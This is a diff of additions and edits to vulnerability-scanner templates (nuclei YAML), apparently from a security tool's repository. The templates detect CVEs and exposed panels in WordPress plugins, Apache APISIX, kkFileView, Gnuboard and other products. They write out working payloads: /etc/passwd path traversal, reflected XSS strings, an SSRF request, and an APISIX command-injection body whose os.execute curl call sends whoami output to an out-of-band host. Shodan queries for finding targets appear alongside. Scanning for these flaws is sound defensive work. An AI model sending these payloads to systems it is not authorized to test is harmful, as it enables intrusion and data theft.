19	+	tags: cve,cve2022,wordpress,wp-plugin,lfi,wp
20	+
21	+	requests:
22	+	- method: GET
23	+	path:
24	+	- '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
25	+
26	+	matchers-condition: and
27	+	matchers:
28	+	- type: regex
29	+	regex:
30	+	- "root:[x*]:0:0"
31	+
32	+	- type: status
33	+	status:
34	+	- 200
35	+
36	+	# Enhanced by mp on 2022/08/01
37	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-1391.yaml

1	+	id: CVE-2022-1391
2	+
3	+	info:
4	+	name: WordPress Cab fare calculator < 1.0.4 - Local File Inclusion
5	+	author: Splint3r7
6	+	severity: critical
7	+	description: \|
8	+	The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.
9	+	reference:
10	+	- https://www.exploit-db.com/exploits/50843
11	+	- https://wordpress.org/plugins/cab-fare-calculator
12	+	- https://wpscan.com/vulnerability/680121fe-6668-4c1a-a30d-e70dd9be5aac
13	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-1391
14	+	classification:
15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16	+	cvss-score: 9.8
17	+	cve-id: CVE-2022-1391
18	+	cwe-id: CWE-22
19	+	tags: cve,cve2022,wordpress,wp-plugin,lfi,wp
20	+
21	+	requests:
22	+	- method: GET
23	+	path:
24	+	- '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
25	+
26	+	matchers-condition: and
27	+	matchers:
28	+	- type: regex
29	+	regex:
30	+	- "root:[x*]:0:0"
31	+
32	+	- type: status
33	+	status:
34	+	- 200
35	+
36	+	# Enhanced by mp on 2022/08/01
37	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-24112.yaml

		skipped 40 lines
41	41		{
42	42		"method":"PUT",
43	43		"path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
44		-	"body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}"
	44	+	"body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl{{interactsh-url}}/`whoami`'); return true end\"}"
45	45		}
46	46		]
47	47		}
		skipped 34 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-34045.yaml

1	+	id: CVE-2022-34045
2	+
3	+	info:
4	+	name: Wavlink WN530HG4 - Access Control
5	+	author: arafatansari
6	+	severity: critical
7	+	description: \|
8	+	Wavlink WN530HG4 M30HG4.V5030.191116 was discovered to contain a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh.
9	+	reference:
10	+	- https://drive.google.com/file/d/1s5uZGC_iSzfCJt9BJ8h-P24vmsrmttrf/view?usp=sharing
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-34045
12	+	classification:
13	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
14	+	cvss-score: 9.8
15	+	cve-id: CVE-2022-34045
16	+	cwe-id: CWE-798
17	+	metadata:
18	+	shodan-query: http.html:"WN530HG4"
19	+	verified: "true"
20	+	tags: cve,cve2022,wavlink,exposure
21	+
22	+	requests:
23	+	- raw:
24	+	- \|
25	+	GET /backupsettings.dat HTTP/1.1
26	+	Host: {{Hostname}}
27	+
28	+	matchers-condition: and
29	+	matchers:
30	+	- type: word
31	+	part: body
32	+	words:
33	+	- 'Salted__'
34	+
35	+	- type: word
36	+	part: header
37	+	words:
38	+	- application/octet-stream
39	+
40	+	- type: status
41	+	status:
42	+	- 200
43	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-35151.yaml

1	+	id: CVE-2022-35151
2	+
3	+	info:
4	+	name: kkFileView v4.1.0 - Cross Site Scripting
5	+	author: arafatansari
6	+	severity: medium
7	+	description: \|
8	+	kkFileView v4.1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
9	+	reference:
10	+	- https://github.com/kekingcn/kkFileView/issues/366
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-35151
12	+	classification:
13	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
14	+	cvss-score: 6.1
15	+	cve-id: CVE-2022-35151
16	+	cwe-id: CWE-79
17	+	metadata:
18	+	shodan-query: http.html:"kkFileView"
19	+	verified: "true"
20	+	tags: cve,cve2022,xss,kkfileview
21	+
22	+	requests:
23	+	- raw:
24	+	- \|
25	+	GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1
26	+	Host: {{Hostname}}
27	+
28	+	matchers-condition: and
29	+	matchers:
30	+	- type: word
31	+	part: body
32	+	words:
33	+	- '<svg/onload=alert(document.domain)>'
34	+	- '图片预览'
35	+	condition: and
36	+
37	+	- type: word
38	+	part: header
39	+	words:
40	+	- text/html
41	+
42	+	- type: status
43	+	status:
44	+	- 200
45	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-37153.yaml

1	+	id: CVE-2022-37153
2	+
3	+	info:
4	+	name: Artica Proxy - Cross Site Scripting
5	+	author: arafatansari
6	+	severity: medium
7	+	description: \|
8	+	An issue was discovered in Artica Proxy 4.30.000000. There is a XSS vulnerability via the password parameter in /fw.login.php.
9	+	reference:
10	+	- https://github.com/Fjowel/CVE-2022-37153
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-37153
12	+	classification:
13	+	cve-id: CVE-2022-37153
14	+	metadata:
15	+	verified: true
16	+	shodan-query: http.html:"Artica"
17	+	tags: cve,cve2022,xss,artica
18	+
19	+	requests:
20	+	- raw:
21	+	- \|
22	+	POST /fw.login.php HTTP/1.1
23	+	Host: {{Hostname}}
24	+	Content-Type: application/x-www-form-urlencoded
25	+
26	+	userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
27	+
28	+	matchers-condition: and
29	+	matchers:
30	+	- type: word
31	+	part: body
32	+	words:
33	+	- 'Password" value="admin"><script>alert(document.domain)</script>'
34	+	- 'Artica Web'
35	+	condition: and
36	+
37	+	- type: word
38	+	part: header
39	+	words:
40	+	- text/html
41	+
42	+	- type: status
43	+	status:
44	+	- 200
45	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/avideo-install.yaml

1	+	id: avideo-install
2	+
3	+	info:
4	+	name: Avideo Installation Setup
5	+	author: ritikchaddha
6	+	severity: high
7	+	metadata:
8	+	verified: true
9	+	shodan-query: http.title:"AVideo"
10	+	fofa-query: "AVideo"
11	+	tags: panel,install,avideo
12	+
13	+	requests:
14	+	- method: GET
15	+	path:
16	+	- "{{BaseURL}}/install/index.php"
17	+
18	+	matchers-condition: and
19	+	matchers:
20	+	- type: word
21	+	part: body
22	+	words:
23	+	- '<title>Install AVideo</title>'
24	+
25	+	- type: status
26	+	status:
27	+	- 200
28	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/openvz-web-login.yaml

1	+	id: openvz-web-login
2	+
3	+	info:
4	+	name: Openvz Web Panel Login
5	+	author: nullfuzz
6	+	severity: info
7	+	description: \|
8	+	OpenVZ Web Panel is a GUI web-based frontend for controlling of the physical and virtual servers with the OpenVZ virtualization technology.
9	+	reference:
10	+	- https://github.com/sibprogrammer/owp
11	+	metadata:
12	+	verified: true
13	+	shodan-query: http.favicon.hash:-1898583197
14	+	tags: panel,openvz
15	+
16	+	requests:
17	+	- method: GET
18	+	path:
19	+	- "{{BaseURL}}"
20	+
21	+	matchers:
22	+	- type: dsl
23	+	dsl:
24	+	- 'status_code == 200'
25	+	- 'contains(body, "Login - OpenVZ Web Panel")'
26	+	condition: and
27	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/zimbra-web-login.yaml

1	+	id: zimbra-web-login
2	+
3	+	info:
4	+	name: Zimbra Collaboration Suite Web Client - Sign In
5	+	author: powerexploit
6	+	severity: info
7	+	description: \|
8	+	Zimbra Collaboration Suite simplifies the communication environment, connects people over multiple channels, and provides a single place to manage collaboration and communication.
9	+	reference:
10	+	- https://www.zimbra.com/
11	+	metadata:
12	+	verified: true
13	+	shodan-query: http.title:"Zimbra Collaboration Suite"
14	+	tags: panel,zimbra
15	+
16	+	requests:
17	+	- method: GET
18	+	path:
19	+	- "{{BaseURL}}"
20	+
21	+	redirects: true
22	+	max-redirects: 2
23	+	matchers-condition: and
24	+	matchers:
25	+	- type: word
26	+	part: body
27	+	words:
28	+	- "Zimbra Collaboration Suite Log In"
29	+	- "Zimbra Web Client Sign In"
30	+	- "Zimbra Web Client Log In"
31	+	condition: or
32	+
33	+	- type: status
34	+	status:
35	+	- 200
36	+
37	+	extractors:
38	+	- type: regex
39	+	part: body
40	+	group: 1
41	+	regex:
42	+	- 'v=([0-9]+)'
43	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/configs/django-variables-exposed.yaml

1	+	id: django-variables-exposed
2	+
3	+	info:
4	+	name: Exposed Django variables
5	+	author: nobody
6	+	severity: info
7	+	description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts
8	+	reference:
9	+	- https://docs.djangoproject.com/en/1.11/ref/exceptions/
10	+	- https://docs.djangoproject.com/en/1.11/topics/logging/#django-security
11	+	- https://github.com/projectdiscovery/nuclei-templates/blob/master/file/logs/django-framework-exceptions.yaml
12	+	metadata:
13	+	verified: true
14	+	tags: exposure,config,django
15	+
16	+	requests:
17	+	- method: GET
18	+	path:
19	+	- "{{BaseURL}}"
20	+
21	+	matchers-condition: and
22	+	matchers:
23	+	- type: word
24	+	words:
25	+	- 'seeing this error because you have <code>DEBUG = True</code>'
26	+	- 'SuspiciousOperation'
27	+	- 'DisallowedHost'
28	+	- 'DisallowedModelAdminLookup'
29	+	- 'DisallowedModelAdminToField'
30	+	- 'DisallowedRedirect'
31	+	- 'InvalidSessionKey'
32	+	- 'RequestDataTooBig'
33	+	- 'SuspiciousFileOperation'
34	+	- 'SuspiciousMultipartForm'
35	+	- 'SuspiciousSession'
36	+	- 'TooManyFieldsSent'
37	+	- 'PermissionDenied'
38	+	condition: or
39	+
40	+	- type: word
41	+	part: header
42	+	words:
43	+	- "text/html"
44	+
45	+	- type: status
46	+	status:
47	+	- 400
48	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/apache/tomcat-pathnormalization.yaml

1	+	id: tomcat-manager-pathnormalization
2	+
3	+	info:
4	+	name: Tomcat Manager Path Normalization
5	+	author: brenocss,organiccrap
6	+	severity: info
7	+	description: A Tomcat Manager login panel was discovered via path normalization. Normalizing a path involves modifying the string that identifies a path or file so that it conforms to a valid path on the target operating system.
8	+	reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
9	+	classification:
10	+	cwe-id: CWE-200
11	+	tags: panel,tomcat,apache
12	+
13	+	requests:
14	+	- method: GET
15	+	path:
16	+	- '{{BaseURL}}/..;/manager/html'
17	+	- '{{BaseURL}}/..;/host-manager/html'
18	+	- '{{BaseURL}}/{{randstr}}/..;/manager/html'
19	+	- '{{BaseURL}}/{{randstr}}/..;/host-manager/html'
20	+
21	+	matchers-condition: and
22	+	matchers:
23	+	- type: word
24	+	words:
25	+	- 'username="tomcat" password="s3cret"'
26	+	- 'manager-gui'
27	+	condition: and
28	+
29	+	- type: status
30	+	negative: true
31	+	status:
32	+	- 403
33	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/shell-history.yaml

		skipped 4 lines
5	5		author: pentest_swissky,geeknik
6	6		severity: low
7	7		description: Discover history for bash, ksh, sh, and zsh
8		-	tags: config
	8	+	tags: misconfig
9	9
10	10		requests:
11	11		- method: GET
12		-	redirects: true
13	12		max-redirects: 1
14	13		path:
15	14		- "{{BaseURL}}/.bash_history"
		skipped 18 lines
34	33		- "ps aux "
35	34		condition: or
36	35
37		-	- type: status
38		-	status:
39		-	- 200
40		-
41	36		- type: word
42	37		words:
43	38		- "<?xml"
		skipped 6 lines
50	45		part: response
51	46		negative: true
52	47
	48	+	- type: status
	49	+	status:
	50	+	- 200
	51	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/springboot/springboot-liquidbase.yaml

1	+	id: springboot-liquidbase
2	+
3	+	info:
4	+	name: Springboot Liquidbase API
5	+	author: ELSFA7110
6	+	severity: low
7	+	description: This liquibase endpoint provides information about database changes
8	+	reference:
9	+	- https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#liquibase
10	+	metadata:
11	+	verified: true
12	+	tags: misconfig,springboot,exposure,liquibase
13	+
14	+	requests:
15	+	- method: GET
16	+	path:
17	+	- "{{BaseURL}}/liquibase"
18	+	- "{{BaseURL}}/actuator/liquibase"
19	+
20	+	stop-at-first-match: true
21	+	matchers-condition: and
22	+	matchers:
23	+	- type: word
24	+	part: body
25	+	words:
26	+	- 'liquibase'
27	+	- '"FILENAME":"'
28	+	condition: and
29	+
30	+	- type: word
31	+	part: header
32	+	words:
33	+	- "application/json"
34	+	- "application/vnd.spring-boot.actuator"
35	+	- "application/vnd.spring-boot.actuator.v1+json"
36	+	- "application/vnd.spring-boot.actuator.v2+json"
37	+	condition: or
38	+
39	+	- type: status
40	+	status:
41	+	- 200
42	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/technologies/avideo-detect.yaml

1	+	id: avideo-detect
2	+
3	+	info:
4	+	name: Avideo Detect
5	+	author: pikpikcu
6	+	severity: info
7	+	metadata:
8	+	verified: true
9	+	shodan-query: http.title:"AVideo"
10	+	fofa-query: "AVideo"
11	+	tags: tech,avideo
12	+
13	+	requests:
14	+	- method: GET
15	+	path:
16	+	- "{{BaseURL}}"
17	+
18	+	redirects: true
19	+	max-redirects: 2
20	+	matchers-condition: and
21	+	matchers:
22	+	- type: regex
23	+	part: body
24	+	regex:
25	+	- '<title>(.)AVideo(.)</title>'
26	+	- 'AVideo Analytics'
27	+	condition: or
28	+
29	+	- type: word
30	+	part: header
31	+	words:
32	+	- "/install/index.php"
33	+	negative: true
34	+
35	+	- type: status
36	+	status:
37	+	- 200
38	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/technologies/openethereum-server-detect.yaml

1	+	id: openethereum-server
2	+
3	+	info:
4	+	name: OpenEthereum JSON-RPC HTTP Server Detect
5	+	author: Nullfuzz
6	+	severity: info
7	+	description: \|
8	+	OpenEthereum is the fastest, lightest, and most "secure" Ethereum client. By default OpenEthereum runs a JSON-RPC HTTP server on port 8545/TCP
9	+	reference:
10	+	- https://github.com/openethereum/openethereum
11	+	- https://openethereum.github.io/
12	+	metadata:
13	+	shodan-query: product:OpenEthereum
14	+	tags: tech,openethereum,ethereum,web3,blockchain
15	+
16	+	requests:
17	+	- raw:
18	+	- \|
19	+	POST / HTTP/1.1
20	+	Host: {{Hostname}}
21	+	Content-Type: application/json
22	+	Content-Length: 66
23	+
24	+	{"method":"web3_clientVersion","params":[],"id":1,"jsonrpc":"2.0"}
25	+
26	+	matchers:
27	+	- type: dsl
28	+	dsl:
29	+	- 'status_code == 200'
30	+	- 'contains(all_headers, "application/json")'
31	+	- 'contains(body, "OpenEthereum")'
32	+	condition: and
33	+
34	+	extractors:
35	+	- type: regex
36	+	part: body
37	+	group: 1
38	+	regex:
39	+	- '(v[0-9a-z-_.]+)'
40	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml

1	+	id: gnuboard-sms-xss
2	+
3	+	info:
4	+	name: Gnuboard CMS - SMS Emoticon XSS
5	+	author: gy741
6	+	severity: medium
7	+	description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server.
8	+	reference:
9	+	- https://sir.kr/g5_pds/4788?page=5
10	+	- https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3
11	+	metadata:
12	+	verified: true
13	+	shodan-query: http.html:"Gnuboard"
14	+	tags: xss,gnuboard
15	+
16	+	requests:
17	+	- method: GET
18	+	path:
19	+	- "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard<svg+onload=alert(document.domain)>"
20	+
21	+	matchers-condition: and
22	+	matchers:
23	+	- type: word
24	+	part: body
25	+	words:
26	+	- '"0nuboard<svg onload=alert(document.domain)>"'
27	+
28	+	- type: word
29	+	part: header
30	+	words:
31	+	- "text/html"
32	+
33	+	- type: status
34	+	status:
35	+	- 200
36	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-rxss.yaml

1	+	id: gnuboard5-rxss
2	+
3	+	info:
4	+	name: Gnuboard5 - Cross Site Scripting
5	+	author: arafatansari
6	+	severity: medium
7	+	description: \|
8	+	Gnuboard 5 is vulnerable to reflected XSS via $_GET['LGD_OID'].
9	+	reference:
10	+	- https://huntr.dev/bounties/ed317cde-9bd1-429e-b6d3-547e72534dd5/
11	+	metadata:
12	+	verified: true
13	+	shodan-query: http.html:"gnuboard5"
14	+	tags: gnuboard,xss
15	+
16	+	requests:
17	+	- method: GET
18	+	path:
19	+	- "{{BaseURL}}/mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E"
20	+
21	+	matchers-condition: and
22	+	matchers:
23	+	- type: word
24	+	words:
25	+	- 'LGD_OID = <script>alert(document.domain)</script>'
26	+
27	+	- type: word
28	+	part: header
29	+	words:
30	+	- text/html
31	+
32	+	- type: status
33	+	status:
34	+	- 200
35	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/gnuboard/gnuboard5-xss.yaml

1	+	id: gnuboard5-xss
2	+
3	+	info:
4	+	name: Gnuboard5 - Cross Site Scripting
5	+	author: arafatansari
6	+	severity: medium
7	+	description: \|
8	+	Gnuboard 5 is vulnerable to reflected XSS to a flaw in the clean_xss_tags() function called in new.php.
9	+	reference:
10	+	- https://huntr.dev/bounties/ad2a9b32-fe6c-43e9-9b05-2c77c58dde6a/
11	+	metadata:
12	+	verified: true
13	+	shodan-query: http.html:"gnuboard5"
14	+	tags: xss,gnuboard,gnuboard5
15	+
16	+	requests:
17	+	- method: GET
18	+	path:
19	+	- "{{BaseURL}}/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
20	+
21	+	matchers-condition: and
22	+	matchers:
23	+	- type: word
24	+	words:
25	+	- 'header\"><script>alert(document.domain)</script>.css?'
26	+
27	+	- type: word
28	+	part: header
29	+	words:
30	+	- text/html
31	+
32	+	- type: status
33	+	status:
34	+	- 200
35	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/ad-widget-lfi.yaml

		skipped 3 lines
4	4		name: WordPress Ad Widget 2.11.0 - Local File Inclusion
5	5		author: 0x_Akoko
6	6		severity: high
7		-	description: WordPress Ad Widget 2.11.0 is vulnerable to local file inclusion. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
	7	+	description: \|
	8	+	WordPress Ad Widget 2.11.0 is vulnerable to local file inclusion. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
8	9		reference:
9	10		- https://cxsecurity.com/issue/WLB-2017100084
10	11		- https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
	12	+	- https://wpscan.com/vulnerability/caca21fe-56bf-4d4c-afc8-4a218e52f0a2
11	13		classification:
12	14		cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
13	15		cvss-score: 7.5
14	16		cwe-id: CWE-22
15		-	tags: wordpress,wp-plugin,lfi
	17	+	tags: wordpress,wp-plugin,lfi,wp,adWidget
16	18
17	19		requests:
18	20		- method: GET
		skipped 2 lines
21	23
22	24		matchers-condition: and
23	25		matchers:
24		-
25	26		- type: regex
26	27		regex:
27	28		- "root:[x*]:0:0"
		skipped 7 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml

1	1		id: advanced-access-manager-lfi
2	2
3	3		info:
4		-	name: WordPress Advanced Access Manager <5.9.9 - Local File Inclusion
	4	+	name: WordPress Advanced Access Manager < 5.9.9 - Local File Inclusion
5	5		author: 0x_Akoko
6	6		severity: high
7		-	description: WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
	7	+	description: \|
	8	+	WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
8	9		reference:
9	10		- https://wpscan.com/vulnerability/9873
10	11		- https://id.wordpress.org/plugins/advanced-access-manager/
	12	+	- https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b
11	13		classification:
12	14		cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
13	15		cvss-score: 7.5
14	16		cwe-id: CWE-22
15		-	tags: wordpress,wp-plugin,lfi
	17	+	tags: wordpress,wp-plugin,lfi,wp,accessmanager
16	18
17	19		requests:
18	20		- method: GET
		skipped 3 lines
22	24		matchers-condition: and
23	25		matchers:
24	26		- type: word
	27	+	part: body
25	28		words:
26	29		- "DB_NAME"
27	30		- "DB_PASSWORD"
28		-	part: body
29	31		condition: and
30	32
31	33		- type: status
		skipped 5 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/brandfolder-open-redirect.yaml

1	1		id: brandfolder-open-redirect
2	2
3	3		info:
4		-	name: WordPress Brandfolder - Remote/Local File Inclusion
	4	+	name: WordPress Brandfolder - Open Redirect (RFI & LFI)
5	5		author: 0x_Akoko
6		-	severity: low
7		-	description: WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
	6	+	severity: medium
	7	+	description: \|
	8	+	WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
8	9		reference:
9	10		- https://www.exploit-db.com/exploits/39591
10		-	tags: wordpress,wp-plugin,lfi,rfi
	11	+	- https://wpscan.com/vulnerability/f850e182-f9c6-4264-b2b1-e587447fe4b1
	12	+	tags: wordpress,wp-plugin,lfi,rfi,redirect,wp,brandfolder
11	13
12	14		requests:
13	15		- method: GET
		skipped 2 lines
16	18
17	19		matchers:
18	20		- type: regex
	21	+	part: header
19	22		regex:
20	23		- '(?m)^(?:Location\s?:\s?)(?:https?://\|//)?(?:[a-zA-Z0-9\-_\.@])interact\.sh.$'
21		-	part: header
22	24
23	25		# Enhanced by mp on 2022/08/01
24	26

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml

1	1		id: eatery-restaurant-open-redirect
2	2
3	3		info:
4		-	name: WordPress Attitude Themes 1.1.1 Open Redirection
	4	+	name: WordPress Eatery Restaurant Themes < 2.2 - Open Redirection
5	5		author: 0x_Akoko
6	6		severity: low
7		-	description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
	7	+	description: \|
	8	+	WordPress Eatery Restaurant Themes 2.2 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect
8	9		reference:
9	10		- https://cxsecurity.com/issue/WLB-2020030183
10		-	tags: wordpress,wp-theme,redirect
	11	+	tags: wordpress,wp-theme,redirect,wp
11	12
12	13		requests:
13	14		- method: GET
		skipped 2 lines
16	17
17	18		matchers:
18	19		- type: regex
	20	+	part: header
19	21		regex:
20	22		- '(?m)^(?:Location\s?:\s?)(?:https?://\|//)?(?:[a-zA-Z0-9\-_\.@])interact\.sh.$'
21		-	part: header
22	23

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml

		skipped 3 lines
4	4		name: WordPress NativeChurch Theme - Local File Inclusion
5	5		author: 0x_Akoko
6	6		severity: high
7		-	description: WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
	7	+	description: \|
	8	+	WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
8	9		reference:
9	10		- https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
10		-	tags: wordpress,wp-theme,lfi
	11	+	- https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1
	12	+	tags: wordpress,wp-theme,lfi,wp
11	13
12	14		requests:
13	15		- method: GET
		skipped 3 lines
17	19		matchers-condition: and
18	20		matchers:
19	21		- type: word
	22	+	part: body
20	23		words:
21	24		- "DB_NAME"
22	25		- "DB_PASSWORD"
23	26		- "DB_HOST"
24	27		- "The base configurations of the WordPress"
25		-	part: body
26	28		condition: and
27	29
28	30		# Enhanced by mp on 2022/07/29
		skipped 1 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml

1	1		id: w3c-total-cache-ssrf
2	2
3	3		info:
4		-	name: Wordpress W3C Total Cache SSRF <= 0.9.4
	4	+	name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
5	5		author: random_robbie
6	6		severity: medium
7		-	description: The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
	7	+	description: \|
	8	+	The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
8	9		reference:
9	10		- https://wpvulndb.com/vulnerabilities/8644
10	11		- https://klikki.fi/adv/w3_total_cache.html
11		-	tags: wordpress,wp-plugin,cache,ssrf
	12	+	tags: wordpress,wp-plugin,cache,ssrf,wp
12	13
13	14		requests:
14	15		- method: GET
15	16		path:
16	17		- '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'
	18	+
17	19		matchers:
18	20		- type: word
	21	+	part: body
19	22		words:
20	23		- "NessusFileIncludeTest"
21		-	part: body
22	24

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml

1	1		id: wordpress-zebra-form-xss
2	2
3	3		info:
4		-	name: Wordpress Zebra Form - Cross-Site Scripting
	4	+	name: Zebra_Form Library <= 2.9.8 - Cross-Site Scripting (XSS)
5	5		author: madrobot
6	6		severity: medium
	7	+	description: \|
	8	+	The Zebra_Form PHP library v2.9.8 (latest) and below, used by some WordPress plugins, is affected by reflected Cross-Site Scripting issues in its process.php file.
7	9		reference:
8	10		- https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
9		-	tags: wordpress,xss
	11	+	- https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
	12	+	tags: wordpress,xss,wp
10	13
11	14		requests:
12	15		- raw:
13	16		- \|
14		-	POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
	17	+	POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1
15	18		Host: {{Hostname}}
16	19		Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
17	20		Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
		skipped 8 lines
26	29		matchers-condition: and
27	30		matchers:
28	31		- type: word
	32	+	part: body
29	33		words:
30		-	- "</script><img src onerror=alert(/XSS-form/)>"
31		-	part: body
	34	+	- "</script><img src onerror=alert(document.domain)>"
	35	+
	36	+	- type: word
	37	+	part: header
	38	+	words:
	39	+	- "text/html"
32	40
33	41		- type: status
34	42		status:
35	43		- 200
36	44
37		-	- type: word
38		-	words:
39		-	- "text/html"
40		-	part: header
41		-

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/wp-ambience-xss.yaml

1	1		id: wp-ambience-xss
2	2
3	3		info:
4		-	name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
	4	+	name: WordPress Theme Ambience <= 1.0 - Cross-Site Scripting (XSS)
5	5		author: daffainfo
6	6		severity: medium
	7	+	description: \|
	8	+	The ambience WordPress theme was affected by a Cross-Site Scripting (XSS) security vulnerability.
7	9		reference:
8	10		- https://www.exploit-db.com/exploits/38568
